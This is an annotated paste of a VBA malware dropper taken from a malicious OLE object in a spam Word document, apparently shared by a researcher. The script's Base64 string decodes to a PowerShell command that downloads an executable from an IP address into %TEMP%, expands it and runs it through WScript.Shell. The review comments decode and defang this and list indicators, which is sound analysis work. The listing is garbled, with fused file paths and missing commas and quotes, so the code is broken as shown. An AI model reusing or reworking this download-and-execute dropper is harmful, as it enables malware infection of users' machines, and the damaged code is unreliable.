dynamoo

Malicious macro from OLE embedded object

Mar 19th, 2015
  1. VBA from a malicious OLE object embedded in a DOC.
  2. http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
  3. -------------------
  ' NOTE(review): everything before "GVhkjbjv =" on the next line is not script. It is the dropped
  ' file name followed by two Windows paths (a Content.Word cache path and a Temp path) that were
  ' fused onto the line by extraction; they presumably come from the OLE package record. The lone
  ' "4" and "h" characters between them look like leftover binary field bytes - confirm against the sample.
  '
  ' The Base64 literal decodes to a "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile"
  ' command line that calls System.Net.WebClient DownloadFile to fetch
  ' hxxp://91.227.18[.]76/smoozy/shake.exe (defanged here) into %TEMP%\JIOiodfhioIH.cab, runs
  ' expand to produce %TEMP%\JIOiodfhioIH.exe, and then starts that file.
  ' The URL and the two %TEMP% file names are usable as indicators. Behaviourally, look for a
  ' script host launching cmd.exe / powershell.exe and for expand writing an .exe into %TEMP%.
  4. Doc_SI2ev??slx.vbsC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev??slx.vbs4C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev??slx.vbshGVhkjbjv = Base64Decode("Y21kIC9LIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgYnlwYXNzIC1ub3Byb2ZpbGUgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovLzkxLjIyNy4xOC43Ni9zbW9venkvc2hha2UuZXhlJywnJVRFTVAlXEpJT2lvZGZoaW9JSC5jYWInKTsgZXhwYW5kICVURU1QJVxKSU9pb2RmaGlvSUguY2FiICVURU1QJVxKSU9pb2RmaGlvSUguZXhlOyBzdGFydCAlVEVNUCVcSklPaW9kZmhpb0lILmV4ZTs=")                   
  ' The second literal decodes to "WScript.Shell"; its Run method executes the decoded command.
  ' The trailing "0" is presumably Run's window-style argument (hidden window) whose separating
  ' comma was lost in extraction - confirm against the original sample.
  5. CreateObject(Base64Decode("V1NjcmlwdC5TaGVsbA==")).Run(""& GVhkjbjv &"")    0              
  ' Base64Decode: decodes a Base64 string and returns the result as a string (assigned on the
  ' last line of the function). In this listing it is called twice, for the command line and for
  ' the "WScript.Shell" ProgID, so neither string appears in clear text in the script.
  ' NOTE(review): the listing is extraction-damaged. Several argument-separating commas are
  ' missing and some quotes are doubled or unbalanced (the Dim, Replace, Err.Raise, Mid, InStr
  ' and String lines), so the code will not parse as shown. Compare with the original sample
  ' before relying on any single line.
  6. Function Base64Decode(ByVal base64String)                  
  7.                    
       ' The standard Base64 alphabet; a character's position in it (minus 1) is its 6-bit value.
  8.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"                
  9.   Dim dataLength     sOut    groupBegin        
  10.                    
  11.                    
       ' Strip line breaks, tabs and (apparently) spaces before decoding; the first and third
       ' Replace calls are damaged in this listing.
  12.   base64String = Replace(base64String    vbCrLf """)
  13.  base64String = Replace(base64String, vbTab, "")
  14.   base64String = Replace(base64String, "" " """)
  15.  
       ' The cleaned input must be a whole number of 4-character groups, otherwise error 1 is raised.
  16.  dataLength = Len(base64String)
  17.  If dataLength Mod 4 <> 0 Then
  18.     Err.Raise 1, ""Base64Decode"    Bad Base64 string
  19.     Exit Function                  
  20.   End If                   
  21.                    
       ' Walk the input one 4-character group at a time; each group yields up to 3 characters.
  22.   For groupBegin = 1 To dataLength Step 4                  
  23.     Dim numDataBytes     CharCounter     thisChar    thisData    nGroup  pOut
  24.     numDataBytes = 3                   
  25.     nGroup = 0                 
  26.                    
  27.     For CharCounter = 0 To 3                   
  28.       thisChar = Mid(base64String    groupBegin + CharCounter    1)        
  29.                    
           ' "=" is padding: it contributes zero bits and reduces the output count for this group.
  30.       If thisChar = "=" Then                   
  31.         numDataBytes = numDataBytes - 1                
  32.         thisData = 0                   
  33.       Else                 
  34.         thisData = InStr(1   Base64  thisChar    vbBinaryCompare) - 1      
  35.       End If                   
           ' InStr gives 0 for a character outside the alphabet, so -1 here means bad input (error 2).
  36.       If thisData = -1 Then                
  37.         Err.Raise 2 Base64Decode    Bad character In Base64 string.        
  38.         Exit Function                  
  39.       End If                   
  40.                    
           ' Shift the running value by 6 bits (x64) and add this character's value.
  41.       nGroup = 64 * nGroup + thisData                  
  42.     Next                   
  43.                        
  44.                    
         ' Render the group value as hex, left-pad it with "0" to 6 digits, then turn each pair
         ' of hex digits into one character via the "&H" hexadecimal prefix.
  45.     nGroup = Hex(nGroup)                   
  46.                        
  47.     nGroup = String(6 - Len(nGroup) "0"") & nGroup
  48.    
  49.    pOut = Chr(CByte(""&H"" & Mid(nGroup, 1, 2))) + _
  50.      Chr(CByte(""&H"" & Mid(nGroup, 3, 2))) + _
  51.      Chr(CByte(""&H"" & Mid(nGroup, 5, 2)))
  52.    
  53.  
         ' Keep only the real data characters of this group; positions produced by "=" padding are dropped.
  54.    sOut = sOut & Left(pOut, numDataBytes)
  55.  Next
  56.  
  57.  Base64Decode = sOut
       ' NOTE(review): the text after "End Function" on the next line is not script. It repeats the
       ' file name and the Temp / Content.Word paths seen before the first statement and is
       ' presumably residue from the OLE package record that extraction fused onto the line.
  58. End Function3C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev.  slx.vbsDoc_SI2ev.  slx.vbsWC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev.  slx.vbs
  59. "